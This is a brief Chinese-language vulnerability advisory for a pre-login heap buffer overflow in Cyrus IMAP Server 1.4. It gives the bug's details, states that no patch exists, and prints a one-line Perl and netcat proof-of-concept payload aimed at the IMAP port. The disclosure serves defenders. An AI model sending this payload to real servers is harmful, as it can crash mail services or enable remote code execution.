Cyrus IMAPD Pre-Login缓冲区溢出漏洞发布时间:2002-12-03 更新时间:2002-12-03 严重程度:中 威胁程度:远程拒绝服务 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:6298 受影响系统 Carnegie Mellon University Cyrus IMAP Server 1.4详细描述 Cyrus IMAPD是免费的开放代码的IMAP后台程序。可以用在UNIX和LINUX系统上。 Cyrus IMAPD没有正确处理过长的字符串。在某些情况下,当用户连接到后台程序,并且发送一个过长的登录字符串,就会发生缓冲区溢出。这导致堆扰乱并且可以覆盖内存空间。可以利用该漏洞执行二进制代码。 测试代码 Timo Sirainen <tss@iki.fi>提供: perl -e 'print "x login {4294967295}\r\n\xf0\xef\xff\xbf\x90\xef\xff\xbf\xfc\xff\xff\xff\xfc\xff\xff\xff";'|nc localhost imap2 <ctrl-c> 解决方案 目前还没有补丁。 相关信息 http://online.securityfocus.com/archive/1/301864 |
